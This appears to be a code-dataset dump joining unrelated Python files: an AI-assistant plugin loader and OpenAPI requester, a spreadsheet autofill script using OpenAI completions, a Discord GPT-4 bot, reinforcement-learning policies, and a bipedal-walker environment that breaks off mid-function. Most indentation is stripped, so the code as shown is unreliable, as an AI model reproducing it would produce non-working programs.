logger = logging.getLogger(__name__)
class AuthConf(BaseModel):
type: str
authorization_type: str = "bearer"
class ApiConf(BaseModel):
type: str
url: str
has_user_authentication: bool = False
is_user_authenticated: bool = False
class AIPluginConf(BaseModel):
schema_version: str
name_for_model: str
name_for_human: str
description_for_model: str
description_for_human: str
auth: AuthConf
api: ApiConf
logo_url: str
contact_email: str
legal_info_url: str
class OpenAIPluginInfo(BaseModel):
ai_plugin: AIPluginConf
open_api: OpenAPISpec
class AddonTokenSource:
def __init__(self, headers: Mapping[str, str], urls: Iterable[str]):
self.headers = headers
self.urls = {
url: f"x-addon-token-{index}" for index, url in enumerate(urls)
}
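        # e.g. urls ["https://a", "https://b"] map to request headers "x-addon-token-0" and
        # "x-addon-token-1" respectively; the Authorization header serves as the default auth.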
def get_token(self, url: str) -> str | None:
return self.headers.get(self.urls[url])
@property
def default_auth(self) -> str | None:
return self.headers.get(hdrs.AUTHORIZATION)
def get_plugin_auth(
auth_type: str,
authorization_type: str,
url: str,
token_source: AddonTokenSource,
) -> str | None:
if auth_type == "none":
return token_source.default_auth
if auth_type == "service_http":
service_token = token_source.get_token(url)
if service_token is None:
raise HTTPException(
status_code=HTTP_401_UNAUTHORIZED,
detail=f"Missing token for {url}",
)
# Capitalizing because Wolfram, for instance, doesn't like lowercase bearer
return f"{authorization_type.capitalize()} {service_token}"
raise HTTPException(
status_code=HTTP_401_UNAUTHORIZED,
detail=f"Unknown auth type {auth_type}",
)
async def get_open_ai_plugin_info(addon_url: str) -> OpenAIPluginInfo:
"""Takes url pointing to .well-known/ai-plugin.json file"""
logger.info(f"Fetching plugin info from {addon_url}")
ai_plugin = await _parse_ai_plugin_conf(addon_url)
# Resolve relative url
ai_plugin.api.url = urljoin(addon_url, ai_plugin.api.url)
logger.info(f"Fetching plugin spec from {ai_plugin.api.url}")
open_api = await _parse_openapi_spec(ai_plugin.api.url)
return OpenAIPluginInfo(ai_plugin=ai_plugin, open_api=open_api)
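# A minimal usage sketch of get_open_ai_plugin_info (inside an async context; the URL below
# is illustrative only):
#   info = await get_open_ai_plugin_info("https://example.com/.well-known/ai-plugin.json")
#   print(info.ai_plugin.name_for_model, info.ai_plugin.api.url)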
@cached()
async def _parse_ai_plugin_conf(url: str) -> AIPluginConf:
async with aget(url) as response:
# content_type=None to disable validation, sometimes response comes as text/json
return parse_obj_as(
AIPluginConf, await response.json(content_type=None)
)
@cached()
async def _parse_openapi_spec(url: str) -> OpenAPISpec:
async with aget(url) as response:
return OpenAPISpec.from_text(await response.text()) # type: ignore
| [] |
2024-01-10 | epam/ai-dial-assistant | aidial_assistant~commands~run_plugin.py | from typing import List
from langchain.tools import APIOperation
from pydantic.main import BaseModel
from typing_extensions import override
from aidial_assistant.application.prompts import (
ADDON_BEST_EFFORT_TEMPLATE,
ADDON_SYSTEM_DIALOG_MESSAGE,
)
from aidial_assistant.chain.command_chain import (
CommandChain,
CommandConstructor,
)
from aidial_assistant.chain.history import History, ScopedMessage
from aidial_assistant.commands.base import (
Command,
ExecutionCallback,
ResultObject,
TextResult,
)
from aidial_assistant.commands.open_api import OpenAPIChatCommand
from aidial_assistant.commands.plugin_callback import PluginChainCallback
from aidial_assistant.commands.reply import Reply
from aidial_assistant.model.model_client import (
Message,
ModelClient,
ReasonLengthException,
)
from aidial_assistant.open_api.operation_selector import collect_operations
from aidial_assistant.utils.open_ai_plugin import OpenAIPluginInfo
class PluginInfo(BaseModel):
info: OpenAIPluginInfo
auth: str | None
class RunPlugin(Command):
def __init__(
self,
model_client: ModelClient,
plugins: dict[str, PluginInfo],
max_completion_tokens: int,
):
self.model_client = model_client
self.plugins = plugins
self.max_completion_tokens = max_completion_tokens
@staticmethod
def token():
return "run-addon"
@override
async def execute(
self, args: List[str], execution_callback: ExecutionCallback
) -> ResultObject:
self.assert_arg_count(args, 2)
name = args[0]
query = args[1]
return await self._run_plugin(name, query, execution_callback)
async def _run_plugin(
self, name: str, query: str, execution_callback: ExecutionCallback
) -> ResultObject:
if name not in self.plugins:
raise ValueError(
f"Unknown addon: {name}. Available addons: {[*self.plugins.keys()]}"
)
plugin = self.plugins[name]
info = plugin.info
ops = collect_operations(info.open_api, info.ai_plugin.api.url)
api_schema = "\n\n".join([op.to_typescript() for op in ops.values()]) # type: ignore
def create_command(op: APIOperation):
return lambda: OpenAPIChatCommand(op, plugin.auth)
command_dict: dict[str, CommandConstructor] = {}
for name, op in ops.items():
# The function is necessary to capture the current value of op.
# Otherwise, only first op will be used for all commands
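            # (a direct `lambda: OpenAPIChatCommand(op, plugin.auth)` here would late-bind
            # `op`: Python closures capture the variable, not its value, so every entry
            # would end up calling the last operation once the loop finishes)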
command_dict[name] = create_command(op)
command_dict[Reply.token()] = Reply
history = History(
assistant_system_message_template=ADDON_SYSTEM_DIALOG_MESSAGE.build(
command_names=ops.keys(),
api_description=info.ai_plugin.description_for_model,
api_schema=api_schema,
),
best_effort_template=ADDON_BEST_EFFORT_TEMPLATE.build(
api_schema=api_schema
),
scoped_messages=[ScopedMessage(message=Message.user(query))],
)
chat = CommandChain(
model_client=self.model_client,
name="PLUGIN:" + name,
command_dict=command_dict,
max_completion_tokens=self.max_completion_tokens,
)
callback = PluginChainCallback(execution_callback)
try:
await chat.run_chat(history, callback)
return TextResult(callback.result)
except ReasonLengthException:
return TextResult(callback.result)
| [] |
2024-01-10 | epam/ai-dial-assistant | aidial_assistant~open_api~requester.py | import json
import logging
from typing import Dict, List, NamedTuple, Optional
import aiohttp.client_exceptions
from aiohttp import hdrs
from langchain.tools.openapi.utils.api_models import APIOperation
from aidial_assistant.commands.base import JsonResult, ResultObject, TextResult
from aidial_assistant.utils.requests import arequest
logger = logging.getLogger(__name__)
class _ParamMapping(NamedTuple):
"""Mapping from parameter name to parameter value."""
query_params: List[str]
body_params: List[str]
path_params: List[str]
class OpenAPIEndpointRequester:
"""Chain interacts with an OpenAPI endpoint using natural language.
Based on OpenAPIEndpointChain from LangChain.
"""
def __init__(self, operation: APIOperation, plugin_auth: str | None):
self.operation = operation
self.param_mapping = _ParamMapping(
query_params=operation.query_params, # type: ignore
body_params=operation.body_params, # type: ignore
path_params=operation.path_params, # type: ignore
)
self.plugin_auth = plugin_auth
def _construct_path(self, args: Dict[str, str]) -> str:
"""Construct the path from the deserialized input."""
path = self.operation.base_url.rstrip("/") + self.operation.path # type: ignore
for param in self.param_mapping.path_params:
path = path.replace(f"{{{param}}}", str(args.pop(param, "")))
return path
def _extract_query_params(self, args: Dict[str, str]) -> Dict[str, str]:
"""Extract the query params from the deserialized input."""
query_params = {}
for param in self.param_mapping.query_params:
if param in args:
query_params[param] = args.pop(param)
return query_params
def _extract_body_params(
self, args: Dict[str, str]
) -> Optional[Dict[str, str]]:
"""Extract the request body params from the deserialized input."""
body_params = None
if self.param_mapping.body_params:
body_params = {}
for param in self.param_mapping.body_params:
if param in args:
body_params[param] = args.pop(param)
return body_params
def deserialize_json_input(self, args: dict) -> dict:
"""Use the serialized typescript dictionary.
Resolve the path, query params dict, and optional requestBody dict.
"""
path = self._construct_path(args)
body_params = self._extract_body_params(args)
query_params = self._extract_query_params(args)
return {
"url": path,
"json": body_params,
"params": query_params,
}
async def execute(
self,
args: dict,
) -> ResultObject:
request_args = self.deserialize_json_input(args)
headers = (
None
if self.plugin_auth is None
else {hdrs.AUTHORIZATION: self.plugin_auth}
)
logger.debug(f"Request args: {request_args}")
async with arequest(
self.operation.method.value, headers=headers, **request_args # type: ignore
) as response:
if response.status != 200:
try:
return JsonResult(json.dumps(await response.json()))
except aiohttp.ContentTypeError:
method_str = str(self.operation.method.value) # type: ignore
error_object = {
"reason": response.reason,
"status_code": response.status,
"method:": method_str.upper(),
"url": request_args["url"],
"params": request_args["params"],
}
return JsonResult(json.dumps(error_object))
if "text" in response.headers[hdrs.CONTENT_TYPE]:
return TextResult(await response.text())
return JsonResult(json.dumps(await response.json()))
| [] |
2024-01-10 | epam/ai-dial-assistant | aidial_assistant~utils~requests.py | from contextlib import asynccontextmanager
from typing import AsyncIterator
from aiohttp import ClientResponse, ClientSession
@asynccontextmanager
async def arequest(
method: str, url: str, headers, **kwargs
) -> AsyncIterator[ClientResponse]:
async with ClientSession(headers=headers) as session:
async with session.request(method, url, **kwargs) as response:
yield response
# Cannot use Requests.aget(...) from langchain because of a bug: https://github.com/langchain-ai/langchain/issues/7953
@asynccontextmanager
async def aget(url: str, headers=None) -> AsyncIterator[ClientResponse]:
async with arequest("GET", url, headers) as response:
yield response
| [] |
2024-01-10 | weberam2/Jukebox | autofilljukebox.py | import pandas as pd
import openai
import os
path = "/home/weberam2/Dropbox/Personal_Misc/ChatGPT/Jukebox/JoF_filled2.xlsx"
df = pd.read_excel(path)
openai.api_key = os.environ["OPENAI_API_KEY"]
## Albums
albumnoentry = df.loc[pd.isna(df['Album']), :].index
for album in albumnoentry:
prompt = "What album does the song " + df['Song'][album] + " by the artist " + df['Artist.1'][album] + " come from? Answer in the form: The album is called:' without quotes "
model = "text-davinci-003"
#model = "gpt-3.5-turbo"
print(prompt)
response = openai.Completion.create(engine=model, prompt=prompt, max_tokens=30)
generated_text = response.choices[0].text
print(generated_text)
albumguess = generated_text.split(":",1)[1]
albumguess = albumguess.strip()
print(albumguess)
    df.loc[album, 'Album'] = albumguess
# Year
yearnoentry = df.loc[pd.isna(df['year']), :].index
for year in yearnoentry:
prompt = "What year did the album " + df['Album'][year] + " by the artist " + df['Artist.1'][year] + " come out? Answer in the form: 'The year was:' without quotes "
model = "text-davinci-003"
#model = "gpt-3.5-turbo"
print(prompt)
response = openai.Completion.create(engine=model, prompt=prompt, max_tokens=50)
generated_text = response.choices[0].text
print(generated_text)
if ":" in generated_text:
yearguess = generated_text.split(":",1)[1]
elif "was " in generated_text:
yearguess = generated_text.split("was ",1)[1]
yearguess = yearguess.strip()
print(yearguess)
df['year'][year] = yearguess
genrenoentry = df.loc[pd.isna(df['genre']), :].index
for genre in genrenoentry:
prompt = "What genre is the album " + df['Album'][genre] + " by the artist " + df['Artist.1'][genre] + "? Answer in the form: 'The genre is:' without quotes "
model = "text-davinci-003"
#model = "gpt-3.5-turbo"
print(prompt)
response = openai.Completion.create(engine=model, prompt=prompt, max_tokens=50)
generated_text = response.choices[0].text
print(generated_text)
if ":" in generated_text:
genreguess = generated_text.split(":",1)[1]
elif "is " in generated_text:
genreguess = generated_text.split("was ",1)[1]
genreguess = genreguess.strip()
print(genreguess)
df['genre'][genre] = genreguess
df.to_excel(path) | [
"What year did the album ",
"What genre is the album ",
" by the artist ",
"? Answer in the form: 'The genre is:' without quotes ",
" come out? Answer in the form: 'The year was:' without quotes ",
"Song",
"What album does the song ",
" come from? Answer in the form: The album is called:' without quotes "
] |
2024-01-10 | Sraym1217/GPT4-discord-bot | discord_GPT_bot.py | import discord
import openai
from openai import OpenAI
import nest_asyncio
import asyncio
import os
from dotenv import load_dotenv
from keep_alive import keep_alive
import logging
import datetime
# Load environment variables
load_dotenv()
# Get the Discord bot token and OpenAI API key from environment variables
# Get the organization ID from environment variables
TOKEN = os.getenv('DISCORD_TOKEN')
client_open = OpenAI(api_key = os.getenv('OPENAI_API_KEY'))
ORG_ID = os.getenv('OPENAI_ORG_ID')
# Create the Discord bot client
client = discord.Client(intents=discord.Intents.all())
async def keep_typing(channel):
while True:
await channel.typing()
await asyncio.sleep(4)
# Handler for when the bot starts up
@client.event
async def on_ready():
print(f'{client.user} has connected to Discord!')
# Handler for incoming messages
@client.event
async def on_message(message):
timestamp = datetime.datetime.now().isoformat()
    # Ignore messages from the bot itself or messages outside a thread
if message.author == client.user or not isinstance(message.channel, discord.Thread):
return
    # Fetch the thread's conversation history
conversation_history = ""
async for message_in_thread in message.channel.history(oldest_first=True):
author = "User" if message_in_thread.author != client.user else "Assistant"
conversation_history += f"{author}: {message_in_thread.content}\n"
    # Check the character count
char_count = len(conversation_history)
if char_count > 127900:
        # If the character count exceeds 127900, drop the oldest part of the history
        char_to_remove = char_count - 127900 # Adjust how many characters to keep
conversation_history = conversation_history[char_to_remove:]
typing_task = asyncio.ensure_future(keep_typing(message.channel))
try:
        # Use the OpenAI API to generate a response to the message
        # Use run_in_executor to run the synchronous call asynchronously
        response = await client.loop.run_in_executor(
            None, # Use the default executor
lambda: client_open.chat.completions.create(
model="gpt-4",
messages=[
{"role": "system", "content": "You are a helpful assistant."},
{"role": "user", "content": f"{conversation_history} \n Assistant:"},
],
)
)
        # Send the response
await message.channel.send(response.choices[0].message.content)
finally:
        typing_task.cancel() # Cancel the typing task
# Start the Discord bot
keep_alive()
client.run(TOKEN)
| [
"You are a helpful assistant.",
"PLACEHOLDER \n Assistant:"
] |
2024-01-10 | joel99/midlevel-reps | gibson~gibson~utils~fuse_policy2.py | import numpy as np
import tensorflow as tf
from baselines.a2c.utils import conv, fc, conv_to_fc, batch_to_seq, seq_to_batch, lstm, lnlstm
from baselines.common.distributions import make_pdtype
import gym.spaces
## Fuse policy using PPO2 from OpenAI Baseline
class FusePolicy(object):
def __init__(self, sess, ob_space, sensor_space, ac_space, nbatch, nsteps, reuse=False): #pylint: disable=W0613
ob_shape = (nbatch,) + ob_space.shape
ob_sensor_shape = (nbatch,) + sensor_space.shape
actdim = ac_space.shape[0]
X_camera = tf.placeholder(tf.uint8, ob_shape, name='Ob_camera') #obs
X_sensor = tf.placeholder(tf.float32, ob_sensor_shape, name='Ob_sensor')
self.pdtype = make_pdtype(ac_space)
with tf.variable_scope("model", reuse=reuse):
h_camera = conv(tf.cast(X_camera, tf.float32)/255., 'c1', nf=32, rf=8, stride=4, init_scale=np.sqrt(2))
h2_camera = conv(h_camera, 'c2', nf=64, rf=4, stride=2, init_scale=np.sqrt(2))
h3_camera = conv(h2_camera, 'c3', nf=64, rf=3, stride=1, init_scale=np.sqrt(2))
h3_camera = conv_to_fc(h3_camera)
h4_camera = fc(h3_camera, 'fc1', nh=512, init_scale=np.sqrt(2))
pi_camera = fc(h4_camera, 'pi', actdim, init_scale=0.01)
vf_camera = fc(h4_camera, 'v', 1)[:,0]
self.pd = self.pdtype.pdfromflat(pi_camera)
with tf.variable_scope("model_sensor", reuse=reuse):
h1_sensor = fc(X_sensor, 'pi_fc1', nh=64, init_scale=np.sqrt(2), act=tf.tanh)
h2_sensor = fc(h1_sensor, 'pi_fc2', nh=64, init_scale=np.sqrt(2), act=tf.tanh)
pi_sensor = fc(h2_sensor, 'pi', actdim, init_scale=0.01)
h1_sensor = fc(X_sensor, 'vf_fc1', nh=64, init_scale=np.sqrt(2), act=tf.tanh)
h2_sensor = fc(h1_sensor, 'vf_fc2', nh=64, init_scale=np.sqrt(2), act=tf.tanh)
vf_sensor = fc(h2_sensor, 'vf', 1)[:,0]
with tf.variable_scope("model", reuse=reuse):
logstd = tf.get_variable(name="logstd", shape=[1, actdim],
initializer=tf.zeros_initializer())
X = tf.concat([X_camera, X_sensor], 0)
pi_full = tf.concat([pi_camera, pi_sensor], 0)
pi = fc(pi_full, 'pi', actdim, init_scale=0.01)
vf_full = tf.concat([vf_camera, vf_sensor], 0)
vf = fc(vf_full, 'vf', 1)[:,0]
pdparam = tf.concat([pi, pi * 0.0 + logstd], axis=1)
self.pd = self.pdtype.pdfromflat(pdparam)
a0 = self.pd.sample()
neglogp0 = self.pd.neglogp(a0)
self.initial_state = None
def step(ob, ob_sensor, *_args, **_kwargs):
a, v, neglogp = sess.run([a0, vf, neglogp0], {X_camera:ob, X_sensor: ob_sensor})
return a, v, self.initial_state, neglogp
def value(ob, ob_sensor, *_args, **_kwargs):
return sess.run(vf, {X_camera:ob, X_sensor: ob_sensor})
self.X = X
self.pi = pi
self.vf = vf
self.step = step
self.value = value
class CnnPolicy(object):
def __init__(self, sess, ob_space, ac_space, nbatch, nsteps, reuse=False, is_discrete=True): #pylint: disable=W0613
if isinstance(ac_space, gym.spaces.Discrete):
self.is_discrete = True
else:
self.is_discrete = False
print("nbatch%d" % (nbatch))
nh, nw, nc = ob_space.shape
ob_shape = (nbatch, nh, nw, nc)
if self.is_discrete:
nact = ac_space.n
else:
nact = ac_space.shape[0]
X = tf.placeholder(tf.uint8, ob_shape) #obs
with tf.variable_scope("model", reuse=reuse):
h = conv(tf.cast(X, tf.float32)/255., 'c1', nf=32, rf=8, stride=4, init_scale=np.sqrt(2))
h2 = conv(h, 'c2', nf=64, rf=4, stride=2, init_scale=np.sqrt(2))
h3 = conv(h2, 'c3', nf=64, rf=3, stride=1, init_scale=np.sqrt(2))
h3 = conv_to_fc(h3)
h4 = fc(h3, 'fc1', nh=512, init_scale=np.sqrt(2))
pi = fc(h4, 'pi', nact, init_scale=0.01)
vf = fc(h4, 'v', 1)[:,0]
if not self.is_discrete:
logstd = tf.get_variable(name="logstd", shape=[1, nact],
initializer=tf.zeros_initializer())
self.pdtype = make_pdtype(ac_space)
if self.is_discrete:
self.pd = self.pdtype.pdfromflat(pi)
a0 = self.pd.sample()
else:
pdparam = tf.concat([pi, pi * 0.0 + logstd], axis=1)
self.pd = self.pdtype.pdfromflat(pdparam)
a0 = self.pd.sample()
neglogp0 = self.pd.neglogp(a0)
self.initial_state = None
def step(ob, *_args, **_kwargs):
a, v, neglogp = sess.run([a0, vf, neglogp0], {X:ob})
assert(a.shape[0] == 1) # make sure a = a[0] don't throw away actions
a = a[0]
return a, v, self.initial_state, neglogp
def value(ob, *_args, **_kwargs):
return sess.run(vf, {X:ob})
self.X = X
self.pi = pi
self.vf = vf
self.step = step
self.value = value
class MlpPolicy(object):
def __init__(self, sess, ob_space, ac_space, nbatch, nsteps, reuse=False): #pylint: disable=W0613
ob_shape = (nbatch,) + ob_space.shape
actdim = ac_space.shape[0]
X = tf.placeholder(tf.float32, ob_shape, name='Ob') #obs
with tf.variable_scope("model", reuse=reuse):
h1 = fc(X, 'pi_fc1', nh=64, init_scale=np.sqrt(2), act=tf.tanh)
h2 = fc(h1, 'pi_fc2', nh=64, init_scale=np.sqrt(2), act=tf.tanh)
pi = fc(h2, 'pi', actdim, init_scale=0.01)
h1 = fc(X, 'vf_fc1', nh=64, init_scale=np.sqrt(2), act=tf.tanh)
h2 = fc(h1, 'vf_fc2', nh=64, init_scale=np.sqrt(2), act=tf.tanh)
vf = fc(h2, 'vf', 1)[:,0]
logstd = tf.get_variable(name="logstd", shape=[1, actdim],
initializer=tf.zeros_initializer())
pdparam = tf.concat([pi, pi * 0.0 + logstd], axis=1)
self.pdtype = make_pdtype(ac_space)
self.pd = self.pdtype.pdfromflat(pdparam)
a0 = self.pd.sample()
neglogp0 = self.pd.neglogp(a0)
self.initial_state = None
def step(ob, *_args, **_kwargs):
a, v, neglogp = sess.run([a0, vf, neglogp0], {X:ob})
return a, v, self.initial_state, neglogp
def value(ob, *_args, **_kwargs):
return sess.run(vf, {X:ob})
self.X = X
self.pi = pi
self.vf = vf
self.step = step
self.value = value | [] |
2024-01-10 | aadharna/watts | watts~utils~box2d~biped_walker_custom.py | # The following code is modified from openai/gym (https://github.com/openai/gym) under the MIT License.
# Modifications Copyright (c) 2020 Uber Technologies, Inc.
import sys
import math
import numpy as np
import Box2D
from Box2D.b2 import (edgeShape, circleShape, fixtureDef,
polygonShape, revoluteJointDef, contactListener)
import gym
from gym import spaces
from gym.utils import colorize, seeding
from collections import namedtuple
# This is simple 4-joints walker robot environment.
#
# There are two versions:
#
# - Normal, with slightly uneven terrain.
#
# - Hardcore with ladders, stumps, pitfalls.
#
# Reward is given for moving forward, total 300+ points up to the far end. If the robot falls,
# it gets -100. Applying motor torque costs a small amount of points, so a more optimal agent
# will get a better score.
#
# Heuristic is provided for testing, it's also useful to get demonstrations to
# learn from. To run heuristic:
#
# python gym/envs/box2d/bipedal_walker.py
#
# State consists of hull angle speed, angular velocity, horizontal speed, vertical speed,
# position of joints and joints angular speed, legs contact with ground, and 10 lidar
# rangefinder measurements to help to deal with the hardcore version. There are no coordinates
# in the state vector. Lidar is less useful in the normal version, but it works.
#
# To solve the game you need to get 300 points in 1600 time steps.
#
# To solve hardcore version you need 300 points in 2000 time steps.
#
# Created by Oleg Klimov. Licensed on the same terms as the rest of OpenAI Gym.
Env_config = namedtuple('Env_config', [
'name',
'ground_roughness',
'pit_gap',
'stump_width', 'stump_height', 'stump_float',
'stair_height', 'stair_width', 'stair_steps'
])
DEFAULT_ENV = Env_config(name='default_env',
ground_roughness=0,
pit_gap=[],
stump_width=[],
stump_height=[],
stump_float=[],
stair_height=[],
stair_width=[],
stair_steps=[])
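# A minimal usage sketch (following the standard gym API of the class defined below; the
# step return signature is assumed to match gym's (obs, reward, done, info)):
#   env = BipedalWalkerCustom(DEFAULT_ENV)
#   env.seed(0)
#   obs = env.reset()
#   obs, reward, done, info = env.step(env.action_space.sample())
# Env_config controls terrain generation: DEFAULT_ENV gives flat ground, while non-empty
# pit_gap / stump_* / stair_* ranges switch on the hardcore obstacles.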
FPS = 50
SCALE = 30.0 # affects how fast-paced the game is, forces should be adjusted as well
MOTORS_TORQUE = 80
SPEED_HIP = 4
SPEED_KNEE = 6
LIDAR_RANGE = 160 / SCALE
INITIAL_RANDOM = 5
HULL_POLY = [
(-30, +9), (+6, +9), (+34, +1),
(+34, -8), (-30, -8)
]
LEG_DOWN = -8 / SCALE
LEG_W, LEG_H = 8 / SCALE, 34 / SCALE
VIEWPORT_W = 600
VIEWPORT_H = 400
TERRAIN_STEP = 14 / SCALE
TERRAIN_LENGTH = 200 # in steps
TERRAIN_HEIGHT = VIEWPORT_H / SCALE / 4
TERRAIN_GRASS = 10    # how long are grass spots, in steps
TERRAIN_STARTPAD = 20 # in steps
FRICTION = 2.5
HULL_FD = fixtureDef(
shape=polygonShape(vertices=[(x / SCALE, y / SCALE)
for x, y in HULL_POLY]),
density=5.0,
friction=0.1,
categoryBits=0x0020,
maskBits=0x001, # collide only with ground
restitution=0.0) # 0.99 bouncy
LEG_FD = fixtureDef(
shape=polygonShape(box=(LEG_W / 2, LEG_H / 2)),
density=1.0,
restitution=0.0,
categoryBits=0x0020,
maskBits=0x001)
LOWER_FD = fixtureDef(
shape=polygonShape(box=(0.8 * LEG_W / 2, LEG_H / 2)),
density=1.0,
restitution=0.0,
categoryBits=0x0020,
maskBits=0x001)
class ContactDetector(contactListener):
def __init__(self, env):
contactListener.__init__(self)
self.env = env
def BeginContact(self, contact):
if self.env.hull == contact.fixtureA.body or self.env.hull == contact.fixtureB.body:
self.env.game_over = True
for leg in [self.env.legs[1], self.env.legs[3]]:
if leg in [contact.fixtureA.body, contact.fixtureB.body]:
leg.ground_contact = True
def EndContact(self, contact):
for leg in [self.env.legs[1], self.env.legs[3]]:
if leg in [contact.fixtureA.body, contact.fixtureB.body]:
leg.ground_contact = False
class BipedalWalkerCustom(gym.Env):
metadata = {
'render.modes': ['human', 'rgb_array'],
'video.frames_per_second': FPS
}
def __repr__(self):
return "{}\nenv\n{}".format(self.__dict__, self.__dict__["np_random"].get_state())
def __init__(self, env_config):
self.spec = None
self.set_env_config(env_config)
self.env_params = None
self.env_seed = None
self._seed()
self.viewer = None
self.world = Box2D.b2World()
self.terrain = None
self.hull = None
self.prev_shaping = None
self.fd_polygon = fixtureDef(
shape=polygonShape(vertices=[(0, 0),
(1, 0),
(1, -1),
(0, -1)]),
friction=FRICTION)
self.fd_edge = fixtureDef(
shape=edgeShape(vertices=[(0, 0),
(1, 1)]),
friction=FRICTION,
categoryBits=0x0001,
)
self._reset()
high = np.array([np.inf] * 24)
self.action_space = spaces.Box(
np.array([-1, -1, -1, -1]), np.array([+1, +1, +1, +1]), dtype=np.float64)
self.observation_space = spaces.Box(-high, high, dtype=np.float64)
def set_env_config(self, env_config):
self.config = env_config
def augment(self, params):
self.env_params = params
def _set_terrain_number(self):
self.hardcore = False
self.GRASS = 0
self.STUMP, self.STAIRS, self.PIT = -1, -1, -1
self._STATES_ = 1
if self.config.stump_width and self.config.stump_height and self.config.stump_float:
# STUMP exist
self.STUMP = self._STATES_
self._STATES_ += 1
if self.config.stair_height and self.config.stair_width and self.config.stair_steps:
# STAIRS exist
self.STAIRS = self._STATES_
self._STATES_ += 1
if self.config.pit_gap:
# PIT exist
self.PIT = self._STATES_
self._STATES_ += 1
if self._STATES_ > 1:
self.hardcore = True
def save_env_def(self, filename):
import json
a = {'config': self.config._asdict(), 'seed': self.env_seed}
with open(filename, 'w') as f:
json.dump(a, f)
def seed(self, seed=None):
return self._seed(seed)
def _seed(self, seed=None):
self.env_seed = seed
self.np_random, seed = seeding.np_random(seed)
return [seed]
def _destroy(self):
if not self.terrain:
return
self.world.contactListener = None
for t in self.terrain:
self.world.DestroyBody(t)
self.terrain = []
self.world.DestroyBody(self.hull)
self.hull = None
for leg in self.legs:
self.world.DestroyBody(leg)
self.legs = []
self.joints = []
self.world = None
def _generate_terrain(self, hardcore):
# GRASS, STUMP, STAIRS, PIT, _STATES_ = range(5)
state = self.GRASS
velocity = 0.0
y = TERRAIN_HEIGHT
counter = TERRAIN_STARTPAD
oneshot = False
self.terrain = []
self.terrain_x = []
self.terrain_y = []
pit_diff = 0
epsilon = 3e-3
for i in range(TERRAIN_LENGTH):
x = i * TERRAIN_STEP
self.terrain_x.append(x)
if state == self.GRASS and not oneshot:
velocity = 0.8 * velocity + 0.01 * np.sign(TERRAIN_HEIGHT - y)
if self.env_params is not None and self.env_params.altitude_fn is not None:
y += velocity
if i > TERRAIN_STARTPAD:
mid = TERRAIN_LENGTH * TERRAIN_STEP / 2.
x_ = (x - mid) * np.pi / mid
y = TERRAIN_HEIGHT + self.env_params.altitude_fn((x_,))[0]
if i == TERRAIN_STARTPAD + 1:
y_norm = self.env_params.altitude_fn((x_,))[0]
y -= y_norm
else:
if i > TERRAIN_STARTPAD:
velocity += self.np_random.uniform(-1, 1) / SCALE # 1
# input parameter: ground_roughness
# ground_roughness = 1
y += self.config.ground_roughness * velocity
elif state == self.PIT and oneshot:
# input parameter: pit_gap
# pit_gap = self.np_random.randint(3, 5) #counter is the control of the GAP distance
# counter = pit_gap
# counter = self.np_random.randint(*self.config.pit_gap)
pit_gap = 1.0 + self.np_random.uniform(*self.config.pit_gap)
counter = np.ceil(pit_gap)
pit_diff = counter - pit_gap
poly = [
(x, y),
(x + TERRAIN_STEP, y),
(x + TERRAIN_STEP, y - 4 * TERRAIN_STEP),
(x, y - 4 * TERRAIN_STEP + epsilon),
]
self.fd_polygon.shape.vertices = poly
t = self.world.CreateStaticBody(
fixtures=self.fd_polygon)
t.color1, t.color2 = (1, 1, 1), (0.6, 0.6, 0.6)
self.terrain.append(t)
self.fd_polygon.shape.vertices = [
(p[0] + TERRAIN_STEP * pit_gap, p[1]) for p in poly]
t = self.world.CreateStaticBody(
fixtures=self.fd_polygon)
t.color1, t.color2 = (1, 1, 1), (0.6, 0.6, 0.6)
self.terrain.append(t)
counter += 2
original_y = y
elif state == self.PIT and not oneshot:
y = original_y
if counter > 1:
y -= 4 * TERRAIN_STEP
if counter == 1:
self.terrain_x[-1] = self.terrain_x[-1] - pit_diff * TERRAIN_STEP
pit_diff = 0
elif state == self.STUMP and oneshot:
# input parameter stump_width, stump_height, stump_float
# stump_width = self.np_random.uniform(*self.config.stump_width)
stump_width = self.np_random.randint(*self.config.stump_width)
stump_height = self.np_random.uniform(
*self.config.stump_height)
stump_float = self.np_random.randint(*self.config.stump_float)
# counter = np.ceil(stump_width)
counter = stump_width
countery = stump_height
poly = [
(x, y + stump_float * TERRAIN_STEP),
(x + stump_width * TERRAIN_STEP, y + stump_float * TERRAIN_STEP),
(x + stump_width * TERRAIN_STEP, y + countery *
TERRAIN_STEP + stump_float * TERRAIN_STEP),
(x, y + countery *
TERRAIN_STEP + stump_float * TERRAIN_STEP + epsilon),
]
self.fd_polygon.shape.vertices = poly
t = self.world.CreateStaticBody(
fixtures=self.fd_polygon)
t.color1, t.color2 = (1, 1, 1), (0.6, 0.6, 0.6)
self.terrain.append(t)
elif state == self.STAIRS and oneshot:
# input parameters: stair_height, stair_width, stair_steps
stair_height = self.np_random.uniform(
*self.config.stair_height)
stair_slope = 1 if self.np_random.rand() > 0.5 else -1
stair_width = self.np_random.randint(*self.config.stair_width)
stair_steps = self.np_random.randint(*self.config.stair_steps)
original_y = y
for s in range(stair_steps):
poly = [
(x + (s * stair_width) * TERRAIN_STEP, y +
(s * stair_height * stair_slope) * TERRAIN_STEP),
(x + ((1 + s) * stair_width) * TERRAIN_STEP, y +
(s * stair_height * stair_slope) * TERRAIN_STEP),
(x + ((1 + s) * stair_width) * TERRAIN_STEP, y +
(-stair_height + s * stair_height * stair_slope) * TERRAIN_STEP),
(x + (s * stair_width) * TERRAIN_STEP, y + (-stair_height +
s * stair_height * stair_slope) * TERRAIN_STEP + epsilon),
]
self.fd_polygon.shape.vertices = poly
t = self.world.CreateStaticBody(
fixtures=self.fd_polygon)
t.color1, t.color2 = (1, 1, 1), (0.6, 0.6, 0.6)
self.terrain.append(t)
counter = stair_steps * stair_width + 1
elif state == self.STAIRS and not oneshot:
s = stair_steps * stair_width - counter
n = s // stair_width
y = original_y + (n * stair_height * stair_slope) * TERRAIN_STEP - \
(stair_height if stair_slope == -1 else 0) * TERRAIN_STEP
oneshot = False
self.terrain_y.append(y)
counter -= 1
if counter == 0:
counter = self.np_random.randint(
TERRAIN_GRASS / 2, TERRAIN_GRASS)
if state == self.GRASS and hardcore:
state = self.np_random.randint(1, self._STATES_)
oneshot = True
else:
state = self.GRASS
oneshot = True
self.terrain_poly = []
for i in range(TERRAIN_LENGTH - 1):
poly = [
(self.terrain_x[i], self.terrain_y[i]),
(self.terrain_x[i + 1], self.terrain_y[i + 1])
]
self.fd_edge.shape.vertices = poly
t = self.world.CreateStaticBody(
fixtures=self.fd_edge)
color = (0.3, 1.0 if i % 2 == 0 else 0.8, 0.3)
t.color1 = color
t.color2 = color
